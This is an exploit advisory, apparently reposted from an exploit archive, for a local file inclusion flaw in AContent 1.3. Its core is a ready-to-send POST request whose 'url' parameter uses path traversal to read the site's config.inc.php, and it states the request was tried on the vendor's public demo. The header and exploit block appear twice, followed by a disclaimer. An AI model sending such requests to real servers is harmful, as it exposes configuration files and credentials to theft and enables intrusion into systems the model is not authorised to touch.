##########################################
[~] Exploit Title: AContent 1.3 Local File Inclusion
[~] Date: 21-03-2013
[~] Author: DaOne aka Mocking Bird
[~] Vendor Homepage: http://atutor.ca/acontent/
[~] Software Link: https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
[~] Category: webapps/php
[~] Version: 1.3
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
##########################################
# Exploit
POST http://localhost/AContent/oauth/lti/common/tool_provider_outcome.php HTTP /1.1
grade=1&key=1&secret=secret&sourcedid=1&submit=Send%20Grade&url=../../../include/config.inc.php
PoC
Tested on Demo http://atutor.ca/acontent/demo/
>>http://img21.imageshack.us/img21/4586/xza.png
[~] Exploit Title: AContent 1.3 Local File Inclusion
[~] Date: 21-03-2013
[~] Author: DaOne aka Mocking Bird
[~] Vendor Homepage: http://atutor.ca/acontent/
[~] Software Link: https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
[~] Category: webapps/php
[~] Version: 1.3
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
##########################################
# Exploit
POST http://localhost/AContent/oauth/lti/common/tool_provider_outcome.php HTTP /1.1
grade=1&key=1&secret=secret&sourcedid=1&submit=Send%20Grade&url=../../../include/config.inc.php
PoC
Tested on Demo http://atutor.ca/acontent/demo/
>>http://img21.imageshack.us/img21/4586/xza.png
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information